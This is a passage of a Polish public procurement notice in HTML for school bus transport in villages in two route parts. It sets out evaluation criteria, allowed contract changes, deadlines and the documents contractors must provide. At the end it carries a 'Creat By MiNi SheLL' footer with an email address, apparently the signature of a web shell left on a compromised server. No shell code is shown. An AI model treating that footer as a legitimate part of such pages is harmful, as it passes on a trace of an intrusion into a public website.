                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Czas reakcji na podstawienie pojazdu zastępczego w sytuacjach awaryjnych </td><td>20</td></tr><tr><td>Ilość autobusów zasilanych sprężonym gazem CNG lub gazem LPG bądź autobusy z napęd hybrydowy czy elektryczny </td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Zamawiający przewiduje możliwość dokonania zmian  postanowień zawartej umowy w  stosunku do treści  oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
1)Wystąpienia zmian powszechnie obowiązujących  przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
2)Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób  zmian będzie umożliwiać usunięcie rozbieżności lub niejasności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów,
3) Zmiana podwykonawcy pod warunkiem spełnienia warunków określonych w umowie, 
4) Zmiana albo rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 22a ust 1 ustawy PZP w celu wykazania spełnienia warunków udziału w postępowaniu. Wykonawca jest zobowiązany wykazać zamawiającemu, iż  proponowany podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby  wykonawca powoływał się w trakcie postepowania o udzielenie zamówienia, oraz wykazać, iż w stosunku do proponowanego  podwykonawca nie zachodzą przesłanki wykluczeniu z postępowania określone w art. 24 ust 1 oraz art. 24 ust 5 pkt 1 ustawy PZP  - w tym celu wykonawca przedkłada  oświadczenie o braku podstaw do wykluczania podwykonawcy wraz z dokumentami potwierdzającymi brak podstaw do wkluczenia
5) skorzystania z podwykonawców w realizacji zamówienia mimo, iż w złożonej ofercie Wykonawca nie przewidywał realizacji części zamówienia w podwykonawstwie;
6) Rezygnacja z podwykonawstwa, zmiany zakresu usług realizowanych w podwykonawstwie,
7)Zmiana osób realizujących zamówienie wykazanych w załączniku nr 7 - wykaz osób. Wykonawca chcąc dokonać zmiany osób  realizujących  zamówienie jest zobowiązany uzyskać wcześniejszą zgodę zamawiającego. W tym celu zwraca się do zamawiającego z wnioskiem podając dane osób  zmienianych oraz przedstawiając dowody, iż wskazana osoba spełnia warunki określone przez Zamawiającego w SIWZ. 
8)Zmiana sprzętu za pomocą, którego będzie realizowane zamówienie  na inny niż wskazany w ofercie. Zamiana ta może nastąpić za zgodą Zamawiającego na inny sprzęt niż wskazany w ofercie pod warunkiem, iż zaproponowany sprzęt odpowiada wymogom postawionym przez Zamawiającego i jest o parametrach nie gorszych niż  zaproponowany przez Wykonawcę w ofercie. W przypadku gdy Wykonawca pragnie dokonać zmian sprzętu za który zamawiający przydzielił punkty w czasie oceny ofert zmiana na inny sprzęt jest dopuszczalna pod warunkiem, iż wskazany pojazd będzie również zasilany  LPG lub CNG lub napędem elektrycznym lub hybrydowym
9)Wystąpienie konieczności wprowadzenia zmian spowodowanych m.in. okolicznościami:
a)siłą wyższa  uniemożliwiająca  realizację przedmiotu umowy zgodnie z umową oraz mająca wpływ na terminowość  wykonania przedmiotu umowy oraz wysokość wynagrodzenia za przedmiot umowy np. ze względu na niespotykane opady śniegu konieczność wprowadzenia do pracy dodatkowego sprzętu
b)przestojów opóźnień zawinionych przez zamawiającego  mających bezpośredni wpływ  na terminowość realizacji przedmiotu umowy
c)zmiana danych związanych z obsługa administracyjno-organizacyjną umowy
d) zmiana terminów płatności za  zrealizowane usługi
e)Wystąpienia omyłek rachunkowych, pisarskich w treści umowy
f)Rezygnacja  przez zamawiającego z realizacji części umowy
g)Zmiana użytych materiałów do świadczenia usługi
10) Zmiana wysokości wynagrodzenia Wykonawcy może nastąpić  m.in. w przypadku:
a) dokonywania zmian w ilościach zakupionych biletów miesięcznych w stosunku do szacowanych ilości podanych w SIWZ .
b) zmiany ustawowej stawki podatku VAT. W przypadku zmniejszenia stawki podatku VAT -  ceny jednostkowe netto pozostają bez zmian.  Wartość wynagrodzenia brutto zostanie pomniejszona z odpowiednim zastosowaniem   zmniejszonej stawki podatku VAT.  W przypadku zwiększenia stawki podatku VAT - ceny jednostkowe netto pozostaną bez zmian a wartość wynagrodzenia brutto zostanie powiększona z odpowiednim zastosowaniem   zwiększonej stawki podatku VAT.
c) zmiany minimalnego wynagrodzenia za pracę  ustalonego  na podstawie art. 2 ust 3-5 ustawy z dnia 10.10.2002r o minimalnym wynagrodzeniu za pracę  i/lub zmian zasad podlegania ubezpieczeniom społecznym, lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne i zdrowotne. Wysokość wynagrodzenia może nastąpić o kwotę wynikającą ze zmiany tych stawek o ile wykonawca wykaże iż zmiany te mają wpływ na koszty wykonania zamówienia przez wykonawcę. Zmiany te będą obowiązywać  od dnia zawarcia przez strony stosowanego aneksu. Wykonawca  zobowiązany jest udokumentować wpływ przedmiotowych zmian na koszty wykonania przedmiotu umowy, w szczególności jest zobowiązany przedłożyć Zamawiającemu dokumenty wskazujące na wzrost wynagrodzeń (w wyniku przedmiotowych zmian) osób biorących udział w realizacji zamówienia oraz wykazać wpływ wzrostu  kosztów wynagrodzeń na wzrost kosztów realizacji umowy
d) Zamawiającemu przysługuje możliwość zmniejszenia /zwiększenia szacunkowych ilości biletów miesięcznych   i tym samym zmniejszenia lub zwiększenia  wynagrodzenia określonego w § 7 ust. 6 umowy. Zmniejszenie   lub zwiększenie wynagrodzenia będzie wymagało zawarcia stosownego aneksu. Wynagrodzenie zostanie ustalone w oparciu o ceny jednostkowe podane w umowie i zwiększoną lub zmniejszoną liczbę biletów.
11)w innych sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy a mających charakter zmian nieistotnych w rozumieniu  z art. 144 ust 1e ustawy PZP
12)jeśli łączna wartość zmian jest mniejsza  niż kwoty określone w przepisach wydanych  na podstawie art. 11 ust 8 ustawy PZP i jest mniejsza od 10% wartości zamówienia określonej pierwotnie w umowie
2.Ponadto Zamawiający przewiduje możliwość dokonania zmian  postanowień zawartej umowy w  stosunku do treści  oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie określonym w art. 144 ust.1 pkt.2 pkt 3, pkt 4,  ust. 1a,   ust. 1b, ust. 1c, ust. 1d, ust.1e, oraz ust. 2 i ust. 3 ustawy Pzp.
3. Warunki dokonywania zmian:
1) pisemny wniosek Wykonawcy lub Zamawiającego;
2) w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 28/11/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1)W przypadku wspólnego ubiegania się o zamówienie wykonawcy ustanawiają  pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ust 1 oraz 24 ust 5 pkt 1 ustawy PZP
3)W przypadku wspólnego ubiegania się o zamówienie przez wykonawców  oświadczenie,  iż wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postepowaniu składa każdy z wykonawców ubiegający się wspólnie o zamówienie; 
4)W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie  o przynależności do grupy kapitałowej  - Załącznik nr 4 składa każdy z wykonawców ( każdy z konsorcjantów, każdy wspólnik  spółki cywilnej).
5)W przypadku wspólnego ubiegania się  o zamówienie przez wykonawców są oni zobowiązani  - każdy z Wykonawców  na wezwanie Zamawiającego złożyć dokumenty i oświadczenia o braku podstaw do wykluczenia.

4.	Wykonawca w celu zawarcia umowy jest zobowiązany przedłożyć n/w dokumenty:
1) przedstawić umowę konsorcjum  jeśli dotyczy;
2) przedstawić umowę spółki cywilnej  jeśli dotyczy,
3) wykaz podwykonawców, umowy z podwykonawcami itd jeśli dotyczy 
4) przedstawi dowód wniesienia zabezpieczenia należytego wykonania umowy, 
5) przedstawi zezwolenia na przewozy regularne na trasach objętych niniejszym zamówieniem  zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (t. j. Dz. U. z 2013 r.,  poz. 1414 z późn. zm.). 
6) Polisę ubezpieczenia odpowiedzialności cywilnej przewoźnika drogowego w ruchu krajowym  o wartości na jedno i wszystkie zdarzenia nie mniejszej niż   200 000,00 PLN  i na okres co najmniej od daty zawarcia umowy do zakończenia realizacji zamówienia. Jeżeli polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony obejmuje okres krótszy niż termin realizacji zamówienia, Wykonawca zobowiązuje się do przedłużenia polisy na cały okres objęty zamówieniem oraz zobowiązuje się do przedkładania kolejnej polisy Zamawiającemu w wypadku zakończenia okresu ubezpieczenia. 
7) zaświadczenia wystawione dla opiekunów którzy będą realizować zamówienie związane  z kierowaniem ruchem drogowym  ukończone szkolenie prowadzone przez wojewódzkie ośrodki ruchu drogowego (art. 6 ust. 3a ustawy Prawo o ruchu drogowym). 
8) zaświadczenia wystawione dla opiekunów którzy będą realizować zamówienie  ukończony kurs  instruktażowy dla opiekunów dzieci dowożonych do szkół.
9) dokument potwierdzający  ukończony kurs pierwszej pomocy,  bhp  dla opiekunów (np. zaświadczenie)

Wykonawca przed podpisaniem umowy zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 5 % zaoferowanej ceny brutto

7.	Na podstawie art. 29 ust 3a ustawy PZP Zamawiający wymaga zatrudnienia przez wykonawcę lub  podwykonawcę osób  bezpośrednio realizujących niniejsze zamówienie  na podstawie umowy o pracę w myśl Kodeksu Pracy. 
7.1.	Wymóg ten dotyczy czynności w zakresie realizacji  zamówienia w szczególności: kierowanie autobusami (kierowca), sprawowanie opieki podczas przewozu (opiekunka)  o ile wykonywanie w/w czynności polega na wykonywaniu pracy w sposób określony w art.  22 §1 ustawy z dnia 26 czerwca 1974r  Kodeksu pracy ( tekst jednolity Dz.U. z 2014r poz.1502 z pźn. zm.) dalej zwanym KP). Zgodnie z treścią art. 22 § 1 KP przez nawiązanie stosunku pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę a pracodawca  zobowiązuje się do zatrudnienia pracownika za wynagrodzeniem.
Powyższy obowiązek  dotyczy również podwykonawców. 

Zamawiający nie zastrzega obowiązku, o którym mowa w art.36a ust 2 ustawy PZP  osobistego wykonania przez wykonawcę  kluczowych części zamówienia.
</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część I obejmująca miejscowości: Widlino, Sulmin, Niestępowo, Babi Dół, Skrzeszewo, Lniska, Elżbietowo, Glincz, Leźno, Czaple, Skrzeszewo Piaski, Łapino, Przyjaźń, Mała Przyjaźń, Otomino, Borkowo<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>60000000-8, 60112000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 22/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Czas reakcji na podstawienie pojazdu zastępczego w sytuacjach awaryjnych </td><td>20</td></tr><tr><td>Ilość autobusów zasilanych sprężonym gazem CNG lub gazem LPG bądź autobusy z napęd hybrydowy czy elektryczny </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b> Realizacji zamówienia nastąpi w dni nauki szkolnej  okresie od dnia zawarcia umowy nie wcześniej niż od dnia.02.01.2017<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część II - obejmująca miejscowości: Chwaszczyno, Barniewice, Rębiechowo, Banino, Dąbrowa, Bysewo, Pępowo, Małkowo, Miszewo, Miszewko, <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>60000000-8, 60112000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 22/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Czas reakcji na podstawienie pojazdu zastępczego w sytuacjach awaryjnych </td><td>20</td></tr><tr><td>Ilość autobusów zasilanych sprężonym gazem CNG lub gazem LPG bądź autobusy z napęd hybrydowy czy elektryczny </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b> Realizacji zamówienia nastąpi w dni nauki szkolnej  okresie od dnia zawarcia umowy nie wcześniej niż od dnia.02.01.2017<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com